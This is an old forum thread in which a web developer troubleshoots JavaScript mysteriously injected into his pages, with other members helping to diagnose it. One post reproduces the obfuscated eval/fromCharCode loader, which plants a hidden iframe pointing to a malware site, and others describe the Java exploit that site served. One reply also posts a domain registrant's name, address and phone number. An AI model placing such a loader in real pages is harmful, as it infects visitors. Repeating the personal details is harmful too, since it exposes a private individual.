Do I have a real virus? Oh geezus...

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Years ago there was a famous virus that had something to do with http://padonack.info...

When I surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document (I can tell by watching the activity window in Safari). This is happening on plain html pages that have no includes or anything. I'm a web dev since '95 so I know a few things...but I can't explain this yet.

Except, that it's from my own computer. Both computers on my network are having the same problem (outside computers are not).

I would venture that either I have a real virus on my machines or it's on my router (which I'm trying to find the manual for).

Kind of worried...it's clear that they are accessing info via a java applet on their end...at a page named 'xxx.htm'...

Anybody else ever see something like this on their end?
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
I'm sorry, but have no idea what you're talking about... unless your webserver (Apache?) adds something, or you subscribe to an adservice (or whatever) then JavaScripts does not insert it self into pages...

If you're running this on Macs with OS X (which you don't say anything about, but I'll assume you are), it's highly unlikely a virus is to blame, you'd actually have the first known infected machines...
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Mitthrawnuruodo said:
I'm sorry, but have no idea what you're talking about... unless your webserver (Apache?) adds something, or you subscribe to an adservice (or whatever) then JavaScripts does not insert it self into pages...

If you're running this on Macs with OS X (which you don't say anything about, but I'll assume you are), it's highly unlikely a virus is to blame, you'd actually have the first known infected machines...
Sorry, I'm freaking out herre...

I'm on OSX 10.3.7 using Safari 1.2.4...

My Apache is not configured to add anything. My AdBlock has never posed any problems of any sort...

My webshost claims it's me...and from what I can determine, the problem is coming my end of things (since others are not experiencing the problem while visiting my site).

Is it possible that the router could be doing this? I don't know much about them...

Trying to figure this out...is there a way with Apple Firewall to block outgoing communications with a particular ip address? I can't find this...
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
I'm surfing with Adblock.css and my plugins turned off and it's still happening. And with Firefox too...

This is not good...

PHP:
<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))</script>
which spells out "document.write('');"

It does this on static html pages too...
 

broken_keyboard

macrumors 65816
Apr 19, 2004
1,144
0
Secret Moon base
From what I can see it will execute the following:

document.write('<iframe height=1 width=1 src=http://padonak.info/fa/></iframe>

Searching the web, it seems that site may contain a jar file that uses a JVM exploit to compromise your machine.
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Yes, that's why I'm pretty freaked out by this... If you search on padonak and hangup you'll find more info...

I'm trying to get the webhost to dig deeper into the matter but yesterday they flat out said it's me, not them.

Actually, if there are any mac people out there who might be able to take a look at this - just to see if they can get the same javascript code that I'm getting perhaps they could IM me?

Thanks...
 

Applespider

macrumors G4
I'm on my work PC at the moment but did find some info about recent padonak attacks that you (or others might find useful). IT appears that its payload is Windows specific but that on some PCs it was getting round Norton etc

This seems to be the most common explanation - not sure if it triggers anything with you. Most people say that it ended up being installed onto their webserver, particularly when they ran forum software. Posting comments on the folder led to the malicious include.

We were maliciously attacked from a padonak.info website that uses IFRAME to download the "proc.jar java. archive and run MainApp.class This, again through IFRAME, loads other classes which contain JavaByteVerify exploit.
http://msmvps.com/donna/archive/2004/07/03/9463.aspx

Good luck
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
From this site:
The gaming website I admin for was hit last week with a padonak.info object. Although at first glance it allowed the JavaByteVerify to enter. It also allowed a backdoor trojan to come in and infect any computer not well guard with an anti virus program/firewall. One person found it got around his Norton, router AND his Black Ice to try leaving a "Bloodhound .6 worm exploit. With another, it dropped in a "Trojan.Win32.Paketes"

The padonak.info object installs on the taskbar and if you clik on it, it will disable the ActiveX preventing the page from working properly. But it allows other nasty buggers to get in too.

I have been combing the web since this attack on Dec 22 and could not find anything under "padonak.info". Finally went to Wilders Secruity forums where a "padobot" and Russian "HangUp" hacker group were mentioned back in October. Then a Google search using the HangUp name.
Sound very much like a Windows problem, first and foremost... how it can affect a Mac is beyond me, even more after skimming through this forum...

Maybe this is a good time to actually run Virex or another AV software and see what they find... ;) ...or ask if your Webservice runs on a PC...?
 

redeye be

macrumors 65816
Jan 27, 2005
1,138
0
BXL
You could always call this guy and ask him what's up
Domain Name: PADONAK.INFO
Registrant Name: Jester Norman
Registrant Organization: SplitInfinity
Registrant Street1: 13553 Poway Rd.
Registrant City: San Diego
Registrant State/Province: CA
Registrant Postal Code: 92064
Registrant Country: US
Registrant Phone: +1.8586792814
if it is a virus you would make the history books! Wouldn't that be great? :eek:

Good luck.
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Applespider said:
This seems to be the most common explanation - not sure if it triggers anything with you. Most people say that it ended up being installed onto their webserver, particularly when they ran forum software. Posting comments on the folder led to the malicious include.
Yep...the problem I have is that it's interfering with my css for whatever reason. I can see the iframe loading onto the page as it's leaving a little space...

I don't have any kind of system for people to insert comments, etc onto my site...I'm not running a blog...

So, do I breathe a little easier thinking that it's something server-side and not me? I hope so...I don't want to be the first...

Thanks...
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Mitthrawnuruodo said:
By the way: What is the address to your site? It would be interesting to see first hand...
I really don't like putting my url into forums...IM me on ichat and I'll give you the link...
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
jvaska said:
I really don't like putting my url into forums...IM me on ichat and I'll give you the link...vvvaska...
I don't really get that, why have a secret homepage...? :rolleyes:

But, anyhow, what I really want to know is the system your page is running on... Can you run your homepage through Whats that site running? (it needs the whole URL, including the http://)...?

My site (http://www.geek.no/), according to this test runs on Linux, with a Apache/2.0.51 (Debian GNU/Linux) DAV/2 FrontPage/5.0.2.2635 PHP/4.3.8-12 mod_ssl/2.0.51 OpenSSL/0.9.7d webserver which is owned by Dataguard AS

Now if your webhost runs on a OS in the Windows family and maybe even an IIS server then we have a very strong suspect, and your machine is most likely as healthy as ever... ;)
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
It's not secret, I just don't want to post it in a forum. I never do...

Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
jvaska said:
It's not secret, I just don't want to post it in a forum. I never do...

Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
Fair enough... ;)

Hmmm... quite a little problem this... have you tried a serch for a proc.jar file...?

And, what happens if you make a REALLY simple html file and upload that... does that too suddenly appear to have a foreign iframe in it...?
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Mitthrawnuruodo said:
Hmmm... quite a little problem this... have you tried a serch for a proc.jar file...?

And, what happens if you make a REALLY simple html file and upload that... does that too suddenly appear to have a foreign iframe in it...?
Don't have proc.jar on my system (or search doesn't find it)...very simple html files do have the iframe...

Normally, my support is very fast. They are clearly thinking this one over before they get back to me. Fingers crossed they find the culprit...

Thanks, v
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
jvaska said:
Don't have proc.jar on my system (or search doesn't find it)...very simple html files do have the iframe...

Normally, my support is very fast. They are clearly thinking this one over before they get back to me. Fingers crossed they find the culprit...

Thanks, v
Well if it didn't have an iframe when you view it through localhost at your own machine and therefore have to be clean when leaving your machine, then it's most likely something that get added by your webhost's server...
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
Ok, here's an idea: Make a simple, but typical html page, with a likewise simple css file. E-mail them to me at einstein<at>c2i<dot>net with a spesific Subject (that's my "spam"-account so most incoming mail from unknowns will be caught by the junk filter) and I'll upload them on my site and post back the link, if that's clean and your webhost still claims it's you, you can give them that link and say: Why isn't the iframe/script added when my file is uploaded here, then...???
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Confirmed...this is a local issue...trying to go forward from here...

Hope this is not a virus...

It's affecting Safari and Firefox...not IE...
 

MisterMe

macrumors G4
Jul 17, 2002
10,650
28
USA
jvaska said:
Years ago there was a famous virus that had something to do with http://padonack.info...

When I surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document (I can tell by watching the activity window in Safari). This is happening on plain html pages that have no includes or anything. I'm a web dev since '95 so I know a few things...but I can't explain this yet.

Except, that it's from my own computer. Both computers on my network are having the same problem (outside computers are not).

I would venture that either I have a real virus on my machines or it's on my router (which I'm trying to find the manual for).

Kind of worried...it's clear that they are accessing info via a java applet on their end...at a page named 'xxx.htm'...

Anybody else ever see something like this on their end?
You do not have a virus. If you did, you would be the first MacOS X user to get one. The only way for that to happen is for you to have written it, which you did not. At any rate, I don't entirely understand the nature of your problem. However, in the last couple of weeks, I have heard of ISPs inserting pop-ups between websites and surfers without the cooperation of the websites. If your site is hosted on your local computer, you can disconnect your computer from the 'net to see if the mysterious code disappears.
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
The same problem is on my two machines...I hate to say this...but is it?

I'm not sure what to do right now. Should I just backup and reinstall?

Oh geezus...
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
MisterMe said:
You do not have a virus. If you did, you would be the first MacOS X user to get one. The only way for that to happen is for you to have written it, which you did not. At any rate, I don't entirely understand the nature of your problem. However, in the last couple of weeks, I have heard of ISPs inserting pop-ups between websites and surfers without the cooperation of the websites. If your site is hosted on your local computer, you can disconnect your computer from the 'net to see if the mysterious code disappears.
Site is not hosted locally...

Would a host insert javascript that clearly drives to a documented hack site?

Nobody can reproduce this. PC's and Mac's now...nobody else has this except for me. On two machines in my network...
 

Mitthrawnuruodo

Moderator emeritus
Mar 10, 2004
13,594
141
Bergen, Norway
Let's see if we can't find the problem (if it really are local, which I strongly doubt, have you checked your ISP...?):
Do you have any "funny" plugins/addons/extentions that you use, either installed directly in your browser (like the Adblock extention in Firefox) or something in your home folder ~/Library/Internet Plug-Ins or systemwide /Library/Internet Plug-Ins ?
 

jvaska

macrumors 6502
Original poster
Feb 18, 2002
432
18
Haiti/NYC
Mitthrawnuruodo said:
Some (free) hosts add a script (or some sort of frame) to all pages making them displaying ads...
My host is not of that caliber...they woudln't do that...